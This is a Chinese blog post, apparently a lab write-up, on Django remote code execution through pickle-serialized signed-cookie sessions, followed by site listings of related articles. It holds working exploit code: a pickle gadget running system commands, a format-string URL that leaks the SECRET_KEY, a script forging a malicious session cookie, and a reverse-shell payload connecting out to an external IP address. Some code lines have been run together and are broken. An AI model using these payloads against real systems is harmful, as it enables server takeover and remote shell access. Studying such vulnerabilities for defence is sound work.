python框架漏洞_Django框架的一些漏洞

最新推荐文章于 2023-07-18 16:12:47 发布
最新推荐文章于 2023-07-18 16:12:47 发布
阅读量737 收藏
点赞数
文章标签: python框架漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39642761/article/details/111424065
版权

首先我们先来了解一下python中的序列号模板 pickle 这里以一段代码为例子

import base64

import pickleclass cmd(object):

def __reduce__(self):

import osreturn (os.system, ('whoami', ))

sersize=base64.b64encode(pickle.dumps(cmd()))

print sersize

Y250CnN5c3RlbQpwMAooUyd3aG9hbWknCnAxCnRwMgpScDMKLg==

然后我们将得到的字符串用pickle.load方法在去加载执行他

import sys

import base64

import pickle

pickle.loads(base64.b64decode(sys.argv[1]))

看见命令被执行

接下来我们对Django框架的rce进行一个简单的分析

环境 centos7 django web

exploit环境 windows10 python2 djang-1.10.2

我们这里以django1.3.0来举例

这里我们django包的路径在

/usr/lib/python2.7/site-packages/django/contrib/sessions

在1.6之前 django对session的处理都是用的PickleSerializer方法来实现的

以我现在的web为例子

调用了PickleSerializer方法来对session进行处理,那么我们接下来看一下整个session的获取调用链可以可以为我们所用 这里跟踪方法到

/usr/lib/python2.7/site-packages/django/contrib/sessions/middleware.py

这里配合我们上面看见的settings可以真的 session可以被我们在传递的时候进行控制

全密钥-SECRET_KEY,作为 Django 项目中最核心的密钥,通常情况下是不可能外泄的,但是凡事都有不能预料的时候,例如,开发人员疏忽将 SECRET_KEY 作为一个 api 密钥加载于 JS 中,又或者项目中存在任意文件下载漏洞,攻击者通过下载 settings.py 文件读取到了密钥 SECRET_KEY 的值,其他种种诸如此类的原因致使 SECRET_KEY 泄露成为可能。

若同时满足上述两个条件,并且使用了 PickleSerializer() 序列化处理过程,那么攻击者就可以构造出恶意的序列化字串,传递给服务器,致使服务器在访问或修改会话信息时调用了相应引擎的 load() 函数,反序列化 session 加密字串,触发 pickle 任意命令执行漏洞。

实战

第一步通过djang格式化字符串获取到加密的安全KEY

http://192.168.79.140/blog/hello/?input={user.groups.model._meta.app_config.module.admin.settings.SECRET_KEY}

第二步构造exp

# coding: utf-8

fromdjango.contrib.sessions.serializers import PickleSerializerfromdjango.core import signingfromdjango.conf import settings

settings.configure(SECRET_KEY='85bus3!*+_3t1ks)&&o(u-liuhucshja!-44a1squ93=#+v+4r') # SECRET_KEY 参数的值为 demo Django 项目的 SECRET_KEY 值class CreateTmpFile(object):

def __reduce__(self):

import subprocessreturn(subprocess.call,

(['touch','/tmp/vulnerable.txt'],))

sess=signing.dumps(

obj=CreateTmpFile(),

serializer=PickleSerializer,

salt='django.contrib.sessions.backends.signed_cookies')

print sess

获取到加密的cookie 然后向需要认证cookie的页面/admin/发包

服务端会获取到一个500的响应

此时看见rce成功

接下来我们构造getshell poc

# coding: utf-8

fromdjango.contrib.sessions.serializers import PickleSerializerfromdjango.core import signingfromdjango.conf import settings

settings.configure(SECRET_KEY='85bus3!*+_3t1ks)&&o(u-liuhucshja!-44a1squ93=#+v+4r')class GetShellWithPython(object):

def __reduce__(self):

import subprocessreturn(subprocess.call,

(['python','-c','import socket,subprocess,os;'

's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'

's.connect(("103.224.82.158",31337));'

'os.dup2(s.fileno(),0);'

'os.dup2(s.fileno(),1);'

'os.dup2(s.fileno(),2);'

'subprocess.call(["/bin/sh","-i"]);'],))

sess=signing.dumps(

obj=GetShellWithPython(),

serializer=PickleSerializer,

salt='django.contrib.sessions.backends.signed_cookies')

print sess

总结

这个环境搭建起来有点麻烦,尤其是安装MySQL-Pthon的时候各种报错 docker方便但是不使用他是为了更好的了解漏洞,因为第一次接触到python的所以做的比较细心

环境搭建

https://github.com/jhao104/django-blog

https://stackoverflow.com/questions/5178292/pip-install-mysql-python-fails-with-environmenterror-mysql-config-not-found

yum install python-devel mysql-devel

exp参考

http://drops.xmd5.com/static/drops/web-8528.html

https://xz.aliyun.com/t/5793

https://segmentfault.com/q/1010000006007036

https://docs.python.org/2/library/pickle.html

https://rickgray.me/2015/09/12/django-command-execution-analysis/

https://www.leavesongs.com/PENETRATION/python-string-format-vulnerability.htm

Y250CnN5c3RlbQpwMAooUyd3aG9hbWknCnAxCnRwMgpScDMKLg==

weixin_39642761
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python128web漏洞挖掘技术的研究_django.zip
07-19
这些项目以Python语言为基础,是一系列多样化的系统。无论是学业预警、自主评测,还是电影推荐、二维码识别,或者是数据加密、信息隐藏,这些项目充分利用了Python语言的优势,为用户提供了高效、灵活的解决方案。 Python语言作为一种高级编程语言,具有简洁、可读性强的特点,使得开发者可以更加专注于解决问题的逻辑。同时,Python拥有丰富的开源库和框架,如Django、Flask、OpenCV等,为项目开发提供了强大的支持。 这些项目的开发旨在为用户提供便捷、智能的服务和功能。Python语言具备广泛的应用领域,从机器学习、自然语言处理,到图像处理、数据可视化,Python在各个领域都有良好的应用场景。同时,Python的生态系统也在不断扩展和发展,拥有丰富的第三方库和工具。 通过Python语言的支持,这些项目可以实现多样化的功能需求,如数据分析、图像处理、网络安全等。同时,Python的简洁性和易读性,使得项目的开发、测试和维护更加高效和方便。 总之,这些项目利用Python语言的优势和多样化特性,为各个领域的应用和研究提供了强大的解决方案。无论是学校学业预警、电影推荐,还是数据加密、图像识别,这些项目都能够高效、灵活地满足用户需求,为用户提供优质的体验。
Django restframework】两种接口安全机制及其配置
在红尘中争渡
10-25 1471
Django DRF两种接口安全机制 Token与JWT的配置及使用
基于Python3的漏洞检测工具 ( Python3 插件式框架 )
weixin_34293911的博客
07-18 557
[TOC] Python3 漏洞检测工具 -- lance lance, a simple version of the vulnerability detection framework based on Python3. 基于Python3的简单版漏洞检测框架 -- lance 可以自定义poc或exp插件,可以指定要加载的poc或exp。 代码已经上传到Github : https://g...
django】4.0版本使用多环境下restframework
ylc的博客
12-12 434
django4.0 + restframework踩坑系列1
python直接执行代码漏洞_Django任意代码执行0day漏洞分析
weixin_39676979的博客
12-15 322
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。从Django的SECTET_KEY到代码执行。Django是一个可以用于快速搭建高性能,优雅的网站的平台,由Python写成。采用了MVC的软件设计模式,即模型M、视图V和控制器C。它最初是被开发来用于管理劳伦斯出版集团旗下的一些以新闻内容为主的网站的,即是CMS(内容管理系统)软...
Django开发框架多个安全漏洞
Yatere的天平秤
10-30 1264
影响版本: Django 1.2.5 Django 1.3 beta 1 Django 1.2.4 Django 1.2.2 Django 1.2 漏洞描述: Django是一款开放源代码的Web应用框架,由Python写成。 Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。 1)当使用缓存后端时django.contr
Django学习笔记(九)--django框架的bug总结
oldbig_lin的博客
10-16 992
1.使用Django框架时无法加载css/js/image等资源文件 我们知道,django的静态资源放在 项目的static文件下,但是在配置中不合理可能会导致无法加载:资源加载会出现404错误 首先在你的settings.py中的最后面加上下面的配置项: STATIC_URL = '/static/' STATIC_ROOT = os.path.join(BASE_D
Python Web 框架 Django 修复SQL注入漏洞(CVE-2022-34265)
murphysec的博客
07-09 1953
Django 是一个由 Python 语言编写的开源 Web 应用框架,Github 上 star 为 64.9K。Python 开发者使用 Django 可以快速开发、设计和部署网站。7月4日,OSCS 监测到 Django 官方修复了一个 SQL 注入漏洞。如果 Trunc() 方法的 kind 参数和 Extract() 方法的 lookup_name 参数没有进行安全过滤,可能会造成 SQL 注入的风险,建议各位开发者关注。更多漏洞详细信息可进入 OSCS 社区查看:https://www.oscs
漏洞深度分析 | CVE-2023-36053-Django 表达式拒绝服务
LJQClqjc的博客
07-10 1241
当这个输入被URLValidator处理时,由于正则表达式的处理时间与输入的长度呈指数关系,所以可能会导致处理时间过长实现导致服务拒绝。它由经验丰富的开发人员构建,解决了 Web 开发的大部分麻烦,因此您可以专注于编写应用程序,而无需重新发明轮子。这是因为正则表达式的处理时间与输入的长度呈指数关系,如果输入的长度非常大会导致处理时间过长,实现DoS。在URLValidator中,增加了一个max_length属性,其值为2048,用于限制URL的最大长度。如果URL的长度超过这个值,将会抛出一个验证错误。
python框架漏洞
小小猪的博客
08-17 793
Django框架漏洞 python框架 Django框架介绍: Django也是一个MVC框架。但是在Django中,控制器接受用户输入的部分由框架自行处理,所以 Django 里更关注的是模型(Model)、模板(Template)和视图(Views)。 漏洞: 1. Django任意代码执行 2. Django重置密码漏洞 3. Django SQL注入漏洞 4. Django 目录遍历漏洞 5....
Python漏洞扫描系统_(项目源码+数据库脚本+文档+LW+PPT)
最新发布
03-03
这个基于Python技术栈的Web应用程序项目源代码提供了一个通用的框架,使得开发者能够学习如何构建可扩展的管理系统。 通过深入研究源代码,您将了解使用Python进行Web应用开发的关键技术和实践方法。 项目的核心...
python142漏洞扫描系统.zip
07-18
同时,Python拥有丰富的开源库和框架,如Django、Flask、OpenCV等,为项目开发提供了强大的支持。 这些项目的开发旨在为用户提供便捷、智能的服务和功能。Python语言具备广泛的应用领域,从机器学习、自然语言处理...
一款基于Python-Django的多功能Web安全渗透测试工具源码.zip
05-08
一款基于Python-Django的多功能Web安全渗透测试工具,包含漏洞扫描,端口扫描,指纹识别,目录扫描,旁站扫描,域名扫描等功能。
Django框架中伪造捕捉到的URLconf值的方法
09-21
主要介绍了在Django框架中伪造捕捉到的URLconf值的方法,DjangoPython各色人气框架中最为著名的一个,需要的朋友可以参考下
Django+Rest Framework后台开发BUG记录
hkh1996的博客
04-16 214
1、在classX中引入外键(models.py) def classX (models.Model): name = models.ForeignKey('classY',on_delete=models.DO_NOTHING) 运行对classX的查询时 q = classX.objects.all() q 报错 Exception Type: InternalError...
django-cve_2019_14234漏洞
xiaomengxin70的博客
05-13 502
首先进入网页Django: the Web framework for perfectionists with deadlines.http://110.40.154.100:8000/ 该漏洞的简介 Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。 该漏洞的出现的原因在于Django中JSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。 进行a.
django version 2.1漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-21 324
django version 2.1漏洞,SQL注入漏洞CVE-2020-7471,CVE-2021-35042 CVE-2021-35042 Django SQL注入漏洞,StringAgg(分隔符)实现利用的潜在 sql注入。 django version 2.1漏洞内容概述:攻击者可通过构造分隔符传递给聚合函数。contrib.postgres.aggregates.StringAgg,从而绕过转义符号(\)并注入恶意SQL语句。 django version 2.1漏洞影响版本:1.11,2.2,3
框架漏洞-CVE复现-Node.JS+Jquery+Django+Flask
xiaoheizi的博客
07-18 759
Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。访问:/admin/vuln/collection/?描述:Node.js-systeminformation是用于获取各种信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数注入payload执行系统命令。添加请求路径:/static/../../../a/../../../../etc/passwd 成功获取敏感信息。
Django及Flask漏洞合集
小小猪的博客
08-20 3284
Django漏洞 Django任意代码执行 poc: import os os.environ.setdefault('DJANGO_SETTINGS_MODULE','settings') from django.conf import settings from django.core import signing from django.contrib.sessions.backends import signed_cookies class
如何看待 python 框架django
09-12
作为一个 AI 语言模型,我认为 Django 是一个非常流行和强大的 Python Web 框架,它提供了许多有用的功能和工具,使得开发 Web 应用程序变得更加容易和高效。它具有良好的可扩展性和灵活性,可以帮助开发人员快速...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值